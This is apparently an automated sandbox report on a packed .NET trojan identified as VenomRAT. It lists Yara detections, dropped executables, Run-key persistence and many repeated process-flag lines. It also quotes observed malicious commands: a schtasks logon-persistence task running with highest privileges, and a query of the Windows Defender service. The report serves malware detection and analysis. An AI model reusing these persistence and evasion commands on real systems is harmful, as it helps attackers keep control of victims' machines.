Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2997d08.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29d5068.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2985470.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Infected.exe.28ed1c8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.29e4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe.2972c08.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2032453597.00000000028ED000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000000.2002428899.0000000000352000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2005734875.00000000029B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.2003317795.0000000000032000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe PID: 6176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Infected.exe PID: 3144, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Loaader.exe PID: 7392, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Client.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loader.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Infected.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Roaming\Loaader.exe, type: DROPPED

Yara detected VenomRAT

Source: Yara match	File source: 2.2.Client.exe.26a68b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2034934534.00000000026A3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Client.exe PID: 6152, type: MEMORYSTR

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "Loaader" /tr '"C:\Users\user\AppData\Roaming\Loaader.exe"'

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: unknown	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\whoami.exe "C:\Windows\system32\whoami.exe" /groups

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YourAppName			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YourAppName			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process created: C:\Windows\System32\sc.exe "C:\Windows\system32\sc.exe" qc windefend

Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender	Jump to behavior
Source: C:\Users\user\AppData\Roaming\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\Loader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender

Source: C:\Users\user\AppData\Roaming\Loader.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\5CF213BBA9FDA9AD12A1 D179E1D3E1F46C85BB4A03E9C9069E8B529999E776B7B12C2D4A47F622535F8C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.PackedNET.2595.1466.2669.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Client.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Infected.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\WinDefend.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loaader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Loader.exe	Process information set: NOOPENFILEERRORBOX
